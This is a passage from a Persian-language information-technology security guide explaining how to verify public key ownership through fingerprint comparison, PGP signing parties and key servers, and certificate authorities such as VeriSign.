‫ﻋﻤﻮﻣﻲ ﻛﻪ ﺑﻪ ﺩﻗﺖ ﻧﻮﺷﺘﻪﺷﺪﻩ‪ ،‬ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﻛﻪ ﺩﻗﻴﻘﹰﺎ ﺍﺟﺮﺍ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﺳﻴﺴﺘﻢ ﻗـﺎﻧﻮﻧﻲ ﻛـﻪ ﺍﺟـﺮﺍﻱ ﺻـﺤﻴﺢ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﺭﺍ ﺿﻤﺎﻧﺖ ﻛﻨﺪ‪ .‬ﺩﺭ ﻣﻮﺭﺩ ‪ PKI‬ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤﻴﻦ ﻓﺼﻞ ﺑﻪ ﺗﻔﺼﻴﻞ ﺑﺤﺚ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﺸﻜﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﻣﺸﻜﻞ ﻋﻤﻴﻖ ﻓﻠﺴﻔﻲ ﺍﺳﺖ‪ .‬ﭼﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻳـﻚ ﻛﻠﻴـﺪ‬
‫ﻋﻤﻮﻣﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺮﺩ ﻳﺎ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻧﺎﻣﺶ ﺭﻭﻱ ﻛﻠﻴﺪ ﺍﺳﺖ؟ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻧﺴﺒﺖ ﺑﻪ ﻳﻚ ﻣﺴﺌﻠﻪ ﻧـﺎﻣﻄﻤﺌﻦ ﻛـﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﻛﺮﺩ؟ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻗﻮﺍﻧﻴﻦ ﻭ ﻓﺮﺍﻳﻨﺪﻫﺎﻱ ﻣﺸﺨﺺ ﺩﺭ ﺍﻳﺠﺎﺩ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﺩﻧﺒﺎﻝ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺩﺭ ﻋﻤﻞ ﻣـﻲﺗـﻮﺍﻧﻴﻢ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﻫﻮﻳﺖ ﺻﺎﺣﺒﺎﻥ ﻛﻠﻴﺪﻫﺎ ﻭ ﺻﺤﺖ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛﻤﻲ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ‪.‬‬
‫ﺳﻪ ﺭﻭﺵ ﺍﺻﻠﻲ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻭﺍﻗﻌﹰﺎ ﺑﻪ ﻓﺮﺩﻱ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ ﻣﺎﻟﻚ ﺁﻥ ﺍﺳﺖ ﺗﻌﻠﻖ ﺩﺍﺭﺩ‪:‬‬
‫ﻼ ﻣﻄﻤﺌﻦ ﺷﺪﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﺧﻮﺩ ﻓﺮﺩ ﺑﮕﻴﺮﻳﺪ ﻭ ﺻﺤﺖ ﺁﻧﺮﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺑﻪ ﺗﺄﻳﻴﺪ ﺑﺮﺳﺎﻧﻴﺪ ﻛﻪ ﺍﺯ ﺁﻥ ﻛﺎﻣ ﹰ‬ ‫‪.١‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻓﺮﺩ ﺩﻳﮕﺮ ﻛﻪ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺷﻤﺎﺳﺖ ﻛﻠﻴﺪ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬ ‫‪.٢‬‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ ﻭ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ‪ ،‬ﺻﺤﺖ ﻛﻠﻴﺪ ﺭﺍ ﮔﻮﺍﻫﻲ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬ ‫‪.٣‬‬

‫ﺗﺄﻳﻴﺪ ﺷﺨﺼﻲ ﺻﺤﺖ ﻛﻠﻴﺪ‬


‫ﻳﻚ ﺭﻭﺵ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ "ﺟﻴﻦ ﺗﺮﻭﻛﺎﺭﺩ" ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ ﺍﻧﺠﺎﻡ ﻣﻼﻗﺎﺕ ﺑﺎ ﺟﻴﻦ ﻭ ﺗﻘﺎﺿﺎ ﺍﺯ ﺍﻭ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ‬
‫ﻛﻠﻴﺪﺵ ﻭ ﻣﻘﺎﻳﺴﺔ ﺭﻗﻢ ﺑﻪ ﺭﻗﻢ ﻛﻠﻴﺪ ﺑﺎ ﺁﻥ ﭼﻴﺰﻱ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﺩﺍﺭﻳﺪ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺟﻴﻦ ﺭﺍ ﺑﺨﻮﺑﻲ ﺑﺸﻨﺎﺳﻴﺪ ﻭ ﻧﻴﺰ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺗﻠﻔـﻦ ﺍﻋﺘﻤـﺎﺩ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﻣﻘﺎﻳﺴﻪ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺗﻠﻔﻦ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ‪ -‬ﺍﻣﺎ ﻧﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻳﻜﻨﻔـﺮ ﺑﺘﻮﺍﻧـﺪ‬
‫ﺍﻃﻼﻋﺎﺕ ﻋﻤﻠﻴﺎﺕ ﻣﻘﺎﻳﺴﻪ ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﺍﺭﻗﺎﻡ ﺭﺍ ﺑﺎ ﺭﻗﻤﻬﺎﻱ ﻳﻚ ﻛﻠﻴﺪ ﺟﻌﻠﻲ ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﺪ‪.‬‬
‫ﭼﻮﻥ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺯ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻃﻮﻻﻧﻲ ﺳﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻣﻘﺎﻳﺴﺔ ﺭﻗﻢ ﺑﻪ ﺭﻗﻢ ﺁﻧﻬﺎ ﻛﺎﺭ ﺟﺎﻟﺒﻲ ﻧﻴﺴﺖ‪ .‬ﺩﺭﻋﻮﺽ ﺷﻤﺎ ﻭ ﺟﻴﻦ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﺮﻛﺪﺍﻡ ﻳﻚ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺯ ﻛﻠﻴﺪ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ ﻭ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﺁﻥ ﺧﻼﺻﻪﻫﺎ ﺭﺍ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻘﺎﻳـﺴﻪ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺍﻳـﻦ‬

‫‪133 Public Key Infrastructure‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٢٠‬‬

‫ﻻ "ﺍﺛﺮ ﺍﻧﮕﺸﺖﻫﺎﻱ ﻛﻠﻴﺪ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‪ ،‬ﺍﺛﺮ ﺍﻧﮕﺸﺖﻫﺎﻱ ﻛﻠﻴـﺪ ﺧـﻮﺩ ﺭﺍ ﺭﻭﻱ‬ ‫ﺧﻼﺻﻪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻛﺎﺭﺗﻬﺎﻱ ﺗﺠﺎﺭﻳﺸﺎﻥ ﭼﺎﭖ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻟﺬﺍ ﺍﮔﺮ ﺷﻤﺎ ﻛﺎﺭﺕ ﺗﺠﺎﺭﻱ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﺟﻴﻦ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻌﺪﹰﺍ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﻭ ﺭﺍ‬
‫‪ download‬ﻭ ﺻﺤﺖ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫ﺗﺼﺪﻳﻖ ﻛﻠﻴﺪﻫﺎﻱ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ‬


‫ﺯﻣﺎﻧﻴﻜﻪ ﻣﺘﻮﺟﻪ ﺷﺪﻳﺪ ﻛﻠﻴﺪ ﺟﻴﻦ ﻭﺍﻗﻌﹰﺎ ﻣﺘﻌﻠﻖ ﺑﻪ ﺧﻮﺩ ﺍﻭﺳﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺳﺎﻳﺮ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺭﺍ ﻛﻪ ﺟﻴﻦ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ‬
‫ﻣﻲﻛﻨﺪ ﺑﭙﺬﻳﺮﻳﺪ‪ .‬ﺟﻴﻦ ﺑﺎ ﺍﻣﻀﺎﻱ ﻛﻠﻴﺪﻫﺎﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺧﻮﺩﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨـﺪ‪ ،‬ﻭ ﺯﻣﺎﻧﻴﻜـﻪ ﺷـﻤﺎ ﻳـﻚ ﻛﻠﻴـﺪ‬
‫ﺍﻣﻀﺎﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺟﻴﻦ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﻫﺴﺘﻴﺪ ﻛﻪ ﺧﻮﺩ ﺟﻴﻦ ﺁﻧﺮﺍ ﺍﻣﻀﺎ ﻛﺮﺩﻩ ﺍﺳﺖ‪ ،‬ﭼﻮﻥ ﻣﻲﺩﺍﻧﻴـﺪ ﻛﻠﻴـﺪ ﺟـﻴﻦ ﻣﻌﺘﺒـﺮ‬
‫ﺍﺳﺖ ﻭ ﻓﺮﺽ ﺭﺍ ﻧﻴﺰ ﺑﺮ ﺍﻳﻦ ﮔﺬﺍﺷﺘﻪﺍﻳﺪ ﻛﻪ ﺗﻨﻬﺎ ﺧﻮﺩ ﺍﻭ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ‪.‬‬
‫ﭘﺬﻳﺮﺵ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻛﻪ ﺟﻴﻦ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﺪ ﺑﺮ ﺍﺳﺎﺱ ﺍﻋﺘﺒﺎﺭ ﻛﻠﻴﺪ ﺟﻴﻦ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﺑﺮ ﺍﺳﺎﺱ ﻣﻴﺰﺍﻥ ﺍﻋﺘﻤﺎﺩﻱ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﺑـﻪ‬
‫ﺧﻮﺩ ﺟﻴﻦ ﺩﺍﺭﻳﺪ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻛﻪ ﺍﻣﻀﺎ ﻣﻲﻛﻨﺪ ﺩﻗﻴﻖ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‪ ،‬ﺍﻳﻦ ﺩﻭ ﻣﻔﻬﻮﻡ ‪ -‬ﺍﻋﺘﺒﺎﺭ ﻛﻠﻴﺪ‬
‫ﻭ ﺍﻋﺘﻤﺎﺩ ﺷﻤﺎ ﺑﻪ ﺻﺎﺣﺐ ﺁﻥ ‪ -‬ﻣﺴﺘﻘﻞ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﭘﻴﺶ ﺍﺯ ﻗﺒﻮﻝ ﻫﺮ ﻛﻠﻴﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﻠﻴـﺪ‬
‫ﻣﻌﺘﺒﺮ‪ ،‬ﻣﻨﺘﻈﺮ ﺗﺄﻳﻴﺪ ﺩﻭ ﻳﺎ ﭼﻨﺪ ﻃﺮﻑ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻻ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻀﺎ‪ ١٣٤‬ﺩﺍﺭﻧﺪ ﺗﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻳﻜﺪﻳﮕﺮ ﺭﺍ ﺑﺮﺭﺳﻲ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺍﻣﻀﺎ ﻛﻨﻨﺪ‪ .‬ﻳﻚ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺩﺭ‬ ‫ﻛﺎﺭﺑﺮﺍﻥ ‪ PGP‬ﻣﻌﻤﻮ ﹰ‬
‫ﭼﻨﻴﻦ ﮔﺮﻭﻫﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻩ ﻳﺎ ﺑﻴﺸﺘﺮ ﺍﻣﻀﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻳﻜﻨﻔﺮ ﺑﺘﻮﺍﻧﺪ ﺑﻌﺪﻫﺎ ﺍﺯ ﺁﻥ ﺍﻣﻀﺎﻫﺎ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺻـﺤﺖ ﺁﻥ ﻛﻠﻴـﺪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻻ ﻛﻠﻴﺪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ ‪ PGP‬ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺗﻮﺯﻳﻊ ﻣﻲﻛﻨﻨﺪ؛ ﻭ ﻟﺬﺍ ﺯﻣﺎﻧﻴﻜﻪ‬ ‫ﻛﻨﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ‪ PGP‬ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻚ ﻛﻠﻴﺪ ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻠﻴﺪ ‪ download‬ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻣﻀﺎﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ ﺁﻳﺎ ﻣﻄﻤﺌﻦ ﻣﻲﺷـﻮﻳﺪ ﻛـﻪ ﻛﻠﻴـﺪ‬
‫ﻭﺍﻗﻌﹰﺎ ﻣﻌﺮﻑ ﻛﺴﻲ ﻛﻪ ﻣﺪﻋﻲ ﻣﺎﻟﻜﻴﺖ ﺁﻥ ﺍﺳﺖ ﻣﻲﺑﺎﺷﺪ ﻳﺎ ﻧﻪ‪.‬‬

‫ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ :‬ﻣﺘﺼﺪﻱﻫﺎﻱ ﺷﺨﺺ ﺛﺎﻟﺚ‬


‫ﻫﺮﭼﻨﺪ "ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻀﺎ" ﻳﻚ ﺭﻭﺵ ﺧﻮﺏ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻋﺘﻤﺎﺩ ﺍﻓﺮﺍﺩ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺗﺠﺮﺑﻪ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺭﻭﺵ ﻋﻤﻠﻲ ﺑﺮﺍﻱ ﺍﻳﺠـﺎﺩ‬
‫ﻻ ﭘﻮﺷﺶ ﺁﻥ ﺑﺴﻴﺎﺭ ﻛﻢ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ‪ .‬ﺑﻌـﻀﻲ‬ ‫ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻣﻠﻲ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺗﺄﻳﻴﺪﺷﺪﻩ ﺑﺼﻮﺭﺕ ﺯﻧﺠﻴﺮﻩﺍﻱ ﻧﻴﺴﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻓﺮﺍﺩ ﻭﻗﺖ ﺁﻧﺮﺍ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻀﺎ ﺑﺮﻭﻧﺪ‪ .‬ﺑﻌﻼﻭﻩ‪ ،‬ﺩﺍﺷﺘﻦ ﺍﻣﻀﺎﻱ ﻛﺴﻲ ﺭﻭﻱ ﻛﻠﻴﺪ ﻳﻚ ﻓﺮﺩ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺁﻥ ﺩﻭ ﻧﻔـﺮ‬
‫ﻳﻜﺪﻳﮕﺮ ﺭﺍ ﻣﻲﺷﻨﺎﺳﻨﺪ‪ ،‬ﻳﺎ ﺣﺪﺍﻗﻞ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻼﻗﺎﺕ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ‪ ،‬ﺍﺳﺘﻔﺎﺩﺓ ﻭﺳﻴﻊ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ‬
‫ﺑﻪ ﻳﻚ ﺩﺭﺧﺖ ﮔﻮﺍﻫﻲﻫﺎ ﺧﺘﻢ ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ )‪ ١٣٥(CA‬ﺩﺭ ﺭﻳـﺸﺔ ﺁﻥ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ‪" .‬ﻣﺮﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ" ﻓـﺮﺩ ﻳـﺎ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻣﺠﻮﺯﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺭﺍ ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻗﺒﻞ ﺍﺯ ﺍﻣﻀﺎﻱ ﻳﻚ ﻛﻠﻴﺪ‪ ،‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺭﺍ ﻭﺿﻊ ﻛﻨﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ‪ ،‬ﻳـﻚ ﺩﺍﻧـﺸﮕﺎﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ ﻛﻪ ﺁﻥ ﻛﻠﻴﺪﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺁﻧﺮﺍ ﺍﻣﻀﺎ ﻛﻨﺪ ﻭﺍﻗﻌﹰﺎ ﺑﻪ ﻳﻚ ﺩﺍﻧﺸﺠﻮﻱ ﺣﻘﻴﻘﻲ ﺗﻌﻠﻖ ﺩﺍﺭﺩ ﻳﺎ ﻧﻪ‪ .‬ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﻳﮕﺮ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻴﭻ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺰﺭﮔﺘﺮﻳﻦ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺟﻬﺎﻥ ‪ - VeriSign -‬ﭼﻨﺪﻳﻦ ﻧﻮﻉ ﻣﺨﺘﻠﻒ ﮔﻮﺍﻫﻲ ﻣﻨﺘـﺸﺮ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺮﻛﺰ ﺗﺤﺖ ﺷﺒﻜﺔ ﻣﻄﻤﺌﻦ ‪ ١٣٦(VTN) VeriSign‬ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻋﻤـﻮﻡ ﺻـﺎﺩﺭ ﻣـﻲﻛﻨـﺪ‪ .‬ﺍﻳـﻦ ﺷـﺮﻛﺖ‬
‫ﻫﻤﭽﻨﻴﻦ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺷﺮﻛﺘﻬﺎ ﺻﺎﺩﺭ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﭘﺎﺋﻴﻦﺗﺮﻳﻦ ﺳﻄﺢ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺻﺎﺩﺭ ﺷﺪﻩ ﺗﻮﺳﻂ ‪ VTN‬ﻫـﻴﭻ ﺗـﻀﻤﻴﻨﻲ‬
‫ﺍﺭﺍﺋﻪ ﻧﻤﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺎﻻﺗﺮﻳﻦ ﺳﻄﻮﺡ ﺁﻥ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ‪ VTN‬ﻗﺒﻞ ﺍﺯ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ،‬ﺻﺎﺣﺐ ﻛﻠﻴﺪ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﻀﺎ ﻣﻲﺷﻮﺩ ﻣﺎﻧﻨﺪ ﺷﻨﺎﺳﻨﺎﻣﻪ ﻣﻲﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻣﻀﺎ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﺷﺎﻣﻞ‬
‫ﺍﻃﻼﻋﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﻀﺎ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻭ ﺍﻃﻼﻋـﺎﺗﻲ ﭼـﻮﻥ ﻧـﺎﻡ ﻣﺮﮐـﺰ‪،‬‬

‫‪134 Signing Parties‬‬


‫‪135 Certification Authority‬‬
‫‪136 VeriSign Trusted Network‬‬
‫‪٣٢١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﺮﮐﺰ‪ ،‬ﻭ ﻧﻴﺰ ﻳﻚ ﺷﻤﺎﺭﻩ ﺳﺮﻳﺎﻝ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺗﺎ ﺍﻣﺮﻭﺯ ﺑﻴﺸﺘﺮﻳﻦ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔـﻮﺍﻫﻲ‪ ،‬ﮔـﻮﺍﻫﻲﻫـﺎﻳﻲ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺧﺎﺹ ﺑﻪ ﻓﺮﺩ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺧﺎﺻﻲ ﺗﻌﻠﻖ ﺩﺍﺭﺩ‪ .‬ﮔﻮﺍﻫﻲﻫﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺍﻱ ﺍﺛﺒـﺎﺕ‬
